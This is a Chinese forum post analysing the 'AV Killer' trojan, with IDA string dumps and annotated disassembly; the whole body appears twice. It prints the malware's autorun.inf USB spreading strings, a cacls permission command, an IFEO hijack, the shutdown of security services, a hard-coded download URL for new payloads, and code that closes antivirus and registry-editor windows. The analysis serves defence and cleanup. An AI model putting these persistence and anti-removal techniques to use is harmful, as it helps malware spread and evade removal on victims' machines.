[原创]AV Killer病毒分析
-
发表于: 2008-10-17 19:50 5354
-
文件采样为:nhbivui.exe,初步分析为:FSG 2.0 -> bart/xt [Overlay]加壳
脱壳分析之,为delphi编写
样本nhbivui.exe是一个隐藏文件,它把auto.exe和autorun.inf释放到各个盘符(包括U盘),利用系统的自动播放功能来达到自动运行的目的。
U盘感染方式
写autorun.inf,在其中写入
.RIF1:00405B68 0000000A C [AutoRun]
.RIF1:00405B8C 00000014 C shell\\open=打开(&O)
.RIF1:00405BA8 00000014 C shell\\open\\Command=
.RIF1:00405BC4 00000015 C shell\\open\\Default=1
.RIF1:00405BE4 0000001D C shell\\explore=资源管理器(&X)
.RIF1:00405C0C 00000017 C shell\\explore\\Command=
.RIF1:00405ED2 00000012 C 橘謀xFF\xFF腽嬅_^[Y]脥@
.RIF1:00405FAC 00000008 C Comspec
.RIF1:00405FB4 00000006 C \xFF\xFF\xFF\xFF\t
.RIF1:00405FBC 0000000A C /c del \"
.RIF1:00406408 0000005E C 椋裓xFF\xFF豚嬈_^[嬪]肧VW孃嬸嬈鑢豛xFF\xFF嬝嬈鑙赲xFF\xFF嬓嬊嬎枋譢xFF\xFF呟~\tS媆aP鑥鉢xFF\xFF_^[脨U嬱兡鳶塃鼖E*赲xFF\xFF3繳h梔@
.RIF1:00406670 00000041 C ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
.RIF1:00406A3C 0000000D C kernel32.dll
.RIF1:00406A4C 00000017 C RegisterServiceProcess
.RIF1:00406D74 00000012 C SeBackupPrivilege
.RIF1:00406DFC 00000013 C SeRestorePrivilege
.RIF1:00407414 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.RIF1:0040744C 0000000A C Software\\
.RIF1:00407814 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.
.RIF1:0040784C 0000000A C Software\\
.RIF1:00407A28 00000010 C \\Program Files\\
.RIF1:00407AC4 00000024 C \\Program Files\\Common Files\\System\\
.RIF1:00407B74 0000002E C \\Program Files\\Common Files\\Microsoft Shared\\
.RIF1:00409310 00000005 C NTFS
.RIF1:00409320 00000016 C cmd /c echo Y| cacls
.RIF1:00409340 0000001D C autorun.inf /t /g everyone:F
.RIF1:00409F98 00000005 C NTFS
.RIF1:00409FA8 00000016 C cmd /c echo Y| cacls
.RIF1:00409FC8 0000001D C autorun.inf /t /g everyone:F
.RIF1:0040A050 00000005 C .dll
.RIF1:0040A5C8 00000014 C set date=1980-01-23
.RIF1:0040A5DC 00000006 C \xFF\xFF\xFF\xFF\v
.RIF1:0040A5E4 0000000C C date %date%
.RIF1:0040A5F8 00000005 C exit
.RIF1:0040A600 00000006 C \xFF\xFF\xFF\xFFJ
.RIF1:0040A608 0000004B C Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\
.RIF1:0040A654 00000009 C Debugger
.RIF1:0040A698 00000014 C Common Files\\System
.RIF1:0040A6F8 00000006 C KVMON
.RIF1:0040A708 0000001E C Common Files\\Microsoft Shared
00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A788 00000006 C \xFF\xFF\xFF\xFFT
.RIF1:0040A790 00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A7E8 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A7F0 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A84C 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A854 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A8B0 00000006 C radio
.RIF1:0040A8B8 00000005 C Type
.RIF1:0040A8C0 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A91C 0000000D C CheckedValue
.RIF1:0040A92C 00000006 C \xFF\xFF\xFF\xFFQ
.RIF1:0040A934 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A988 0000000A C checkbox2
.RIF1:0040A994 0000004F C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\SuperHidden
.RIF1:0040A9E4 0000002F C SYSTEM\\CurrentControlSet\\Services\\SharedAccess
.RIF1:0040AA14 00000006 C Start
.RIF1:0040AA1C 0000002A C SYSTEM\\CurrentControlSet\\Services\\helpsvc
.RIF1:0040AA48 0000000D C CheckedValue
.RIF1:0040AA58 0000003C C Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced
.RIF1:0040AA94 00000010 C ShowSuperHidden
.RIF1:0040AAA4 0000003C C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer
.RIF1:0040AAE0 00000013 C NoDriveTypeAutoRun
.RIF1:0040AAF4 00000029 C SYSTEM\\CurrentControlSet\\Services\\wscsvc
.RIF1:0040AB20 0000002B C SYSTEM\\CurrentControlSet\\Services\\wuauserv
.RIF1:0040AB4C 0000002A C SYSTEM\\CurrentControlSet\\Services\\RSPPSYS
.RIF1:0040AB78 00000025 C SYSTEM\\ControlSet001\\Services\\wscsvc
.RIF1:0040ABA0 00000027 C SYSTEM\\ControlSet001\\Services\\wuauserv // 停止系统服务
.RIF1:0040AD64 00000021 C http://www.webweb.com/TDown1.exe //下载病毒的最新版本(可以作为特征点之一)
.RIF1:0040C178 00000023 C http://www.webweb.com/ReadDown.txt
; Update-path excerpt: delete one file, then test a stored string against the
; hard-coded update URL. The helpers __GetDirectroy, sub_403CA0, sub_403E98 and
; sub_403DE4 are not shown in the post; the roles noted below are inferred from
; how their results are used -- TODO confirm against the full listing.
call __GetDirectroy
; eax = address of the local var_8, edx = value of the variable that
; off_411458 refers to; presumably sub_403CA0 stores a path string in var_8.
lea eax, [ebp+var_8]
mov edx, off_411458
mov edx, [edx]
call sub_403CA0
; The result of sub_403E98 is pushed as lpFileName, so it presumably turns the
; string in var_8 into a C-style pointer.
mov eax, [ebp+var_8]
call sub_403E98
push eax ; lpFileName
; DeleteFileA(lpFileName); the return value is not tested in this excerpt.
call DeleteFileA
; Skip to loc_40AD29 when the dword that off_4114F8 refers to is 0.
mov eax, off_4114F8
cmp dword ptr [eax], 0
jz loc_40AD29
; eax = that stored value, edx = the hard-coded URL. The jz right after the
; call tests flags set by sub_403DE4, which looks like a string comparison.
; NOTE(review): the download itself is outside this excerpt.
mov eax, off_4114F8
mov eax, [eax]
mov edx, offset s_HttpWww_webwe ; "http://www.webweb.com/TDown1.exe"
call sub_403DE4
jz loc_40AD29
删除旧版本下载新的版本
防止用户使用一些工具进行杀毒,代码如下
; Start of the routine that looks for windows of security tools.
; Standard frame setup, then ebx/esi/edi are saved.
push ebp
mov ebp, esp
push ebx
push esi
push edi
; Install an SEH frame: handler loc_40F5D8 plus the previous head of the
; chain read from fs:[0] (eax is 0), then fs:[0] is pointed at the new record.
xor eax, eax
push ebp
push offset loc_40F5D8
push dword ptr fs:[eax]
mov fs:[eax], esp
; FindWindowA(lpClassName = "#32770", lpWindowName = WindowName); stdcall
; arguments are pushed right to left.
push offset WindowName ; " "
push offset s_32770 ; "#32770" = the standard dialog-box window class
call FindWindowA //寻找对应的窗口
; ebx = window handle returned by FindWindowA (0 when nothing matched).
mov ebx, eax
; The string below is the title of a dedicated removal tool for the
; "AV Killer/8749" trojan. sub_405E68 receives eax = window handle and
; edx = that title; its body is not shown in the post, which treats the pair
; as a lookup for a dialog with this title -- TODO confirm.
mov edx, offset s_AvS8749AI ; "\"AV终结者/8749\"木马专杀"
mov eax, ebx
call sub_405E68
相当于FindWindow("#32770"," AV终结者")
其他类似:
; Same lookup for another tool: FindWindowA(lpClassName = "#32770",
; lpWindowName = s_WindowsXA). The IDA comment on the label gives the title
; string, which translates to "Windows Cleanup Assistant".
loc_40F529: ; "Windows 清理助手"
push offset s_WindowsXA
push offset s_32770 ; "#32770"
call FindWindowA
监视的注册表操作:
; FindWindowA(lpClassName = "#32770", lpWindowName = s_RNO). The title string
; in the IDA comment translates to "Edit String"; the post identifies it as the
; registry editor's value-editing dialog.
loc_40F58C: ; "编辑字符串"
push offset s_RNO
push offset s_32770 ; "#32770"
call FindWindowA ; this entry specifically targets registry editing
如果窗口标题为“编辑字符串”,说明用户正要在注册表编辑器里修改与隐藏文件有关的那个键值,木马会自动把这个窗口关闭。
等等,几乎常见的工具都出现在这个名单中了。
; Resolve RegisterServiceProcess from kernel32.dll at run time and call it.
; hModule = LoadLibraryA("kernel32.dll"); skip everything if the load failed.
push offset LibFileName ; "kernel32.dll"
call LoadLibraryA
mov hModule, eax
cmp hModule, 0
jz short loc_406A32
; dword_4130A8 = GetProcAddress(hModule, "RegisterServiceProcess")
push offset s_Registerservi ; "RegisterServiceProcess"
mov eax, hModule
push eax ; hModule
call GetProcAddress
mov dword_4130A8, eax
; RegisterServiceProcess(dwProcessId = 0, dwType = 1): 0 means the calling
; process, 1 is RSP_SIMPLE_SERVICE.
; NOTE(review): no NULL check on the resolved pointer is visible here. The
; export exists only in the Windows 9x/Me kernel32.dll, so on NT-based systems
; GetProcAddress would return NULL -- confirm whether the full function guards
; the indirect call.
push 1
push 0
call dword_4130A8
; Release the module reference taken by LoadLibraryA.
mov eax, hModule
push eax ; hLibModule
call FreeLibrary_0
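木马先加载kernel32.dll,再利用GetProcAddress得到RegisterServiceProcess这个API的地址,然后调用它把自己注册为系统服务(服务进程)。需要注意,RegisterServiceProcess只存在于Windows 9x/Me的kernel32.dll中,作用是让进程不出现在任务列表里;在NT系列系统上GetProcAddress会返回NULL,而上面这段代码里看不到对返回值的检查。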
删除用户的还原,GHOST
; Four calls to sub_406C4C with eax = 80000002h (HKEY_LOCAL_MACHINE) and
; edx = a SafeBoot subkey path. The IDA comments are truncated; the strings
; table in the post gives the full paths, which all end in
; {4D36E967-E325-11CE-BFC1-08002BE10318} (the DiskDrive device class GUID).
; sub_406C4C is not shown; the post states that it deletes the key.
; Triage note: check that these four keys still exist on a suspect host.

; ControlSet001 ... SafeBoot\Minimal\{GUID}
mov edx, offset s_SystemControl ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\M"...
mov eax, 80000002h
call sub_406C4C
; ControlSet001 ... SafeBoot\Network\{GUID}
mov edx, offset s_SystemContr_0 ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\N"...
mov eax, 80000002h
call sub_406C4C
; CurrentControlSet ... SafeBoot\Minimal or \Network (comment truncated)
mov edx, offset s_SystemCurrent ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
; CurrentControlSet ... the other of Minimal / Network
mov edx, offset s_SystemCurre_0 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
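删除上述SafeBoot注册表键,使用户进入安全模式时出现问题。{4D36E967-E325-11CE-BFC1-08002BE10318}是磁盘驱动器设备类的GUID,排查和修复时应检查SafeBoot\Minimal和SafeBoot\Network下的这一项是否还在。
发现有过主动防御的功能,但是还没有分析好相关代码,大致估计还是劫持这类比较老套的技术
分析sys后,再贴出来吧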
脱壳分析之,为delphi编写
样本nhbivui.exe是一个隐藏文件,它把auto.exe和autorun.inf释放到各个盘符(包括U盘),利用系统的自动播放功能来达到自动运行的目的。
U盘感染方式
写autorun.inf,在其中写入
.RIF1:00405B68 0000000A C [AutoRun]
.RIF1:00405B8C 00000014 C shell\\open=打开(&O)
.RIF1:00405BA8 00000014 C shell\\open\\Command=
.RIF1:00405BC4 00000015 C shell\\open\\Default=1
.RIF1:00405BE4 0000001D C shell\\explore=资源管理器(&X)
.RIF1:00405C0C 00000017 C shell\\explore\\Command=
.RIF1:00405ED2 00000012 C 橘謀xFF\xFF腽嬅_^[Y]脥@
.RIF1:00405FAC 00000008 C Comspec
.RIF1:00405FB4 00000006 C \xFF\xFF\xFF\xFF\t
.RIF1:00405FBC 0000000A C /c del \"
.RIF1:00406408 0000005E C 椋裓xFF\xFF豚嬈_^[嬪]肧VW孃嬸嬈鑢豛xFF\xFF嬝嬈鑙赲xFF\xFF嬓嬊嬎枋譢xFF\xFF呟~\tS媆aP鑥鉢xFF\xFF_^[脨U嬱兡鳶塃鼖E*赲xFF\xFF3繳h梔@
.RIF1:00406670 00000041 C ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
.RIF1:00406A3C 0000000D C kernel32.dll
.RIF1:00406A4C 00000017 C RegisterServiceProcess
.RIF1:00406D74 00000012 C SeBackupPrivilege
.RIF1:00406DFC 00000013 C SeRestorePrivilege
.RIF1:00407414 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.RIF1:0040744C 0000000A C Software\\
.RIF1:00407814 0000002E C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
.
.RIF1:0040784C 0000000A C Software\\
.RIF1:00407A28 00000010 C \\Program Files\\
.RIF1:00407AC4 00000024 C \\Program Files\\Common Files\\System\\
.RIF1:00407B74 0000002E C \\Program Files\\Common Files\\Microsoft Shared\\
.RIF1:00409310 00000005 C NTFS
.RIF1:00409320 00000016 C cmd /c echo Y| cacls
.RIF1:00409340 0000001D C autorun.inf /t /g everyone:F
.RIF1:00409F98 00000005 C NTFS
.RIF1:00409FA8 00000016 C cmd /c echo Y| cacls
.RIF1:00409FC8 0000001D C autorun.inf /t /g everyone:F
.RIF1:0040A050 00000005 C .dll
.RIF1:0040A5C8 00000014 C set date=1980-01-23
.RIF1:0040A5DC 00000006 C \xFF\xFF\xFF\xFF\v
.RIF1:0040A5E4 0000000C C date %date%
.RIF1:0040A5F8 00000005 C exit
.RIF1:0040A600 00000006 C \xFF\xFF\xFF\xFFJ
.RIF1:0040A608 0000004B C Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\
.RIF1:0040A654 00000009 C Debugger
.RIF1:0040A698 00000014 C Common Files\\System
.RIF1:0040A6F8 00000006 C KVMON
.RIF1:0040A708 0000001E C Common Files\\Microsoft Shared
00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A788 00000006 C \xFF\xFF\xFF\xFFT
.RIF1:0040A790 00000055 C SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A7E8 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A7F0 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A84C 00000006 C \xFF\xFF\xFF\xFFX
.RIF1:0040A854 00000059 C SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
.RIF1:0040A8B0 00000006 C radio
.RIF1:0040A8B8 00000005 C Type
.RIF1:0040A8C0 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A91C 0000000D C CheckedValue
.RIF1:0040A92C 00000006 C \xFF\xFF\xFF\xFFQ
.RIF1:0040A934 00000052 C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\hidden\\showall
.RIF1:0040A988 0000000A C checkbox2
.RIF1:0040A994 0000004F C software\\microsoft\\windows\\currentversion\\explorer\\advanced\\folder\\SuperHidden
.RIF1:0040A9E4 0000002F C SYSTEM\\CurrentControlSet\\Services\\SharedAccess
.RIF1:0040AA14 00000006 C Start
.RIF1:0040AA1C 0000002A C SYSTEM\\CurrentControlSet\\Services\\helpsvc
.RIF1:0040AA48 0000000D C CheckedValue
.RIF1:0040AA58 0000003C C Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced
.RIF1:0040AA94 00000010 C ShowSuperHidden
.RIF1:0040AAA4 0000003C C SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer
.RIF1:0040AAE0 00000013 C NoDriveTypeAutoRun
.RIF1:0040AAF4 00000029 C SYSTEM\\CurrentControlSet\\Services\\wscsvc
.RIF1:0040AB20 0000002B C SYSTEM\\CurrentControlSet\\Services\\wuauserv
.RIF1:0040AB4C 0000002A C SYSTEM\\CurrentControlSet\\Services\\RSPPSYS
.RIF1:0040AB78 00000025 C SYSTEM\\ControlSet001\\Services\\wscsvc
.RIF1:0040ABA0 00000027 C SYSTEM\\ControlSet001\\Services\\wuauserv // 停止系统服务
.RIF1:0040AD64 00000021 C http://www.webweb.com/TDown1.exe //下载病毒的最新版本(可以作为特征点之一)
.RIF1:0040C178 00000023 C http://www.webweb.com/ReadDown.txt
; Update-path excerpt: delete one file, then test a stored string against the
; hard-coded update URL. The helpers __GetDirectroy, sub_403CA0, sub_403E98 and
; sub_403DE4 are not shown in the post; the roles noted below are inferred from
; how their results are used -- TODO confirm against the full listing.
call __GetDirectroy
; eax = address of the local var_8, edx = value of the variable that
; off_411458 refers to; presumably sub_403CA0 stores a path string in var_8.
lea eax, [ebp+var_8]
mov edx, off_411458
mov edx, [edx]
call sub_403CA0
; The result of sub_403E98 is pushed as lpFileName, so it presumably turns the
; string in var_8 into a C-style pointer.
mov eax, [ebp+var_8]
call sub_403E98
push eax ; lpFileName
; DeleteFileA(lpFileName); the return value is not tested in this excerpt.
call DeleteFileA
; Skip to loc_40AD29 when the dword that off_4114F8 refers to is 0.
mov eax, off_4114F8
cmp dword ptr [eax], 0
jz loc_40AD29
; eax = that stored value, edx = the hard-coded URL. The jz right after the
; call tests flags set by sub_403DE4, which looks like a string comparison.
; NOTE(review): the download itself is outside this excerpt.
mov eax, off_4114F8
mov eax, [eax]
mov edx, offset s_HttpWww_webwe ; "http://www.webweb.com/TDown1.exe"
call sub_403DE4
jz loc_40AD29
删除旧版本下载新的版本
防止用户使用一些工具进行杀毒,代码如下
; Start of the routine that looks for windows of security tools.
; Standard frame setup, then ebx/esi/edi are saved.
push ebp
mov ebp, esp
push ebx
push esi
push edi
; Install an SEH frame: handler loc_40F5D8 plus the previous head of the
; chain read from fs:[0] (eax is 0), then fs:[0] is pointed at the new record.
xor eax, eax
push ebp
push offset loc_40F5D8
push dword ptr fs:[eax]
mov fs:[eax], esp
; FindWindowA(lpClassName = "#32770", lpWindowName = WindowName); stdcall
; arguments are pushed right to left.
push offset WindowName ; " "
push offset s_32770 ; "#32770" = the standard dialog-box window class
call FindWindowA //寻找对应的窗口
; ebx = window handle returned by FindWindowA (0 when nothing matched).
mov ebx, eax
; The string below is the title of a dedicated removal tool for the
; "AV Killer/8749" trojan. sub_405E68 receives eax = window handle and
; edx = that title; its body is not shown in the post, which treats the pair
; as a lookup for a dialog with this title -- TODO confirm.
mov edx, offset s_AvS8749AI ; "\"AV终结者/8749\"木马专杀"
mov eax, ebx
call sub_405E68
相当于FindWindow("#32770"," AV终结者")
其他类似:
; Same lookup for another tool: FindWindowA(lpClassName = "#32770",
; lpWindowName = s_WindowsXA). The IDA comment on the label gives the title
; string, which translates to "Windows Cleanup Assistant".
loc_40F529: ; "Windows 清理助手"
push offset s_WindowsXA
push offset s_32770 ; "#32770"
call FindWindowA
监视的注册表操作:
; FindWindowA(lpClassName = "#32770", lpWindowName = s_RNO). The title string
; in the IDA comment translates to "Edit String"; the post identifies it as the
; registry editor's value-editing dialog.
loc_40F58C: ; "编辑字符串"
push offset s_RNO
push offset s_32770 ; "#32770"
call FindWindowA ; this entry specifically targets registry editing
如果窗口标题为“编辑字符串”,说明用户正要在注册表编辑器里修改与隐藏文件有关的那个键值,木马会自动把这个窗口关闭。
等等,几乎常见的工具都出现在这个名单中了。
; Resolve RegisterServiceProcess from kernel32.dll at run time and call it.
; hModule = LoadLibraryA("kernel32.dll"); skip everything if the load failed.
push offset LibFileName ; "kernel32.dll"
call LoadLibraryA
mov hModule, eax
cmp hModule, 0
jz short loc_406A32
; dword_4130A8 = GetProcAddress(hModule, "RegisterServiceProcess")
push offset s_Registerservi ; "RegisterServiceProcess"
mov eax, hModule
push eax ; hModule
call GetProcAddress
mov dword_4130A8, eax
; RegisterServiceProcess(dwProcessId = 0, dwType = 1): 0 means the calling
; process, 1 is RSP_SIMPLE_SERVICE.
; NOTE(review): no NULL check on the resolved pointer is visible here. The
; export exists only in the Windows 9x/Me kernel32.dll, so on NT-based systems
; GetProcAddress would return NULL -- confirm whether the full function guards
; the indirect call.
push 1
push 0
call dword_4130A8
; Release the module reference taken by LoadLibraryA.
mov eax, hModule
push eax ; hLibModule
call FreeLibrary_0
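木马先加载kernel32.dll,再利用GetProcAddress得到RegisterServiceProcess这个API的地址,然后调用它把自己注册为系统服务(服务进程)。需要注意,RegisterServiceProcess只存在于Windows 9x/Me的kernel32.dll中,作用是让进程不出现在任务列表里;在NT系列系统上GetProcAddress会返回NULL,而上面这段代码里看不到对返回值的检查。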
删除用户的还原,GHOST
; Four calls to sub_406C4C with eax = 80000002h (HKEY_LOCAL_MACHINE) and
; edx = a SafeBoot subkey path. The IDA comments are truncated; the strings
; table in the post gives the full paths, which all end in
; {4D36E967-E325-11CE-BFC1-08002BE10318} (the DiskDrive device class GUID).
; sub_406C4C is not shown; the post states that it deletes the key.
; Triage note: check that these four keys still exist on a suspect host.

; ControlSet001 ... SafeBoot\Minimal\{GUID}
mov edx, offset s_SystemControl ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\M"...
mov eax, 80000002h
call sub_406C4C
; ControlSet001 ... SafeBoot\Network\{GUID}
mov edx, offset s_SystemContr_0 ; "SYSTEM\\ControlSet001\\Control\\SafeBoot\\N"...
mov eax, 80000002h
call sub_406C4C
; CurrentControlSet ... SafeBoot\Minimal or \Network (comment truncated)
mov edx, offset s_SystemCurrent ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
; CurrentControlSet ... the other of Minimal / Network
mov edx, offset s_SystemCurre_0 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
mov eax, 80000002h
call sub_406C4C
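删除上述SafeBoot注册表键,使用户进入安全模式时出现问题。{4D36E967-E325-11CE-BFC1-08002BE10318}是磁盘驱动器设备类的GUID,排查和修复时应检查SafeBoot\Minimal和SafeBoot\Network下的这一项是否还在。
发现有过主动防御的功能,但是还没有分析好相关代码,大致估计还是劫持这类比较老套的技术
分析sys后,再贴出来吧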